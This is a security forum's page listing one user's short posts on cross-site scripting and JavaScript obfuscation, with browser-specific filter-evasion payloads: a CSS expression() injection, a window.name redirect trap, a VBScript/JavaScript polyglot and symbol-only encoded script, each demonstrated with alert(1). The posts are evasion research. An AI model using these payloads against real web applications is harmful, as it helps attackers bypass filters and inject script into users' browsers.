Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 

Current Page: 1 of 1
Results 1 - 11 of 11
2 years ago
Yosuke HASEGAWA
RuntimeObject("w*")["window"]["alert"](1); // IE http://d.hatena.ne.jp/st4rdust/20120518/1337319251
Forum: Obfuscation
3 years ago
Yosuke HASEGAWA
innerHTML=location.hash // Firefox ~{valueOf:alert} // IE seems no way for non-alnum code...
Forum: XSS Info
3 years ago
Yosuke HASEGAWA
or use tab
Forum: XSS Info
3 years ago
Yosuke HASEGAWA
<script type="text/javascript" src="/path" onerror="javascript:location=window.name"></script> and prepare trap page: window.open( "target.html", "javascript:alert(1)" )
Forum: XSS Info
3 years ago
Yosuke HASEGAWA
Very nice. I did it :)
Forum: Obfuscation
3 years ago
Yosuke HASEGAWA
Ummm... too hard. cannot emerge from src attribute.
Forum: XSS Info
4 years ago
Yosuke HASEGAWA
Yes, sometimes works but sometimes not works. Once you execute the code like as following, javascript:_="alert";function::[_](1) after execute above, the code I tweet will be work. javascript:$="@mozilla.org/js/function";_="alert";$::[_](1)
Forum: Obfuscation
4 years ago
Yosuke HASEGAWA
works in my IE8 . <style /><a href="} body{xss:expression(alert(1))}">click</a>
Forum: Obfuscation
5 years ago
Yosuke HASEGAWA
Thanks all. I'm unduly impressed for Hackvertor. Next story is character encoding polyglot javascript. The script source is here: http://utf-8.jp/joke/detectenc.js.txt The detectCharSet() function solves charset of itself. For example, the code like as following shows "UTF-8". <script src="detectenc.js.txt" charset="utf-8"></script> <
Forum: XSS Info
5 years ago
Yosuke HASEGAWA
Polyglot script. works as VBScript on IE and works as JavaScript on other browsers. -- <script la[0x00]nguage="vbscript" language="javascript"> rem = null; foo = function( msg ){ rem /* Function foo( msg ) rem */ MsgBox = alert; MsgBox(msg) rem /* End Function : rem */ } </script> ... <script la[0x00]nguage="vbscript&
Forum: XSS Info
5 years ago
Yosuke HASEGAWA
No alnum, only symbols. tested on Firefox. not work on IE. //----------------------------------------------------------------------------- _=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+ ({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$) +"")[__]+
Forum: XSS Info
Current Page: 1 of 1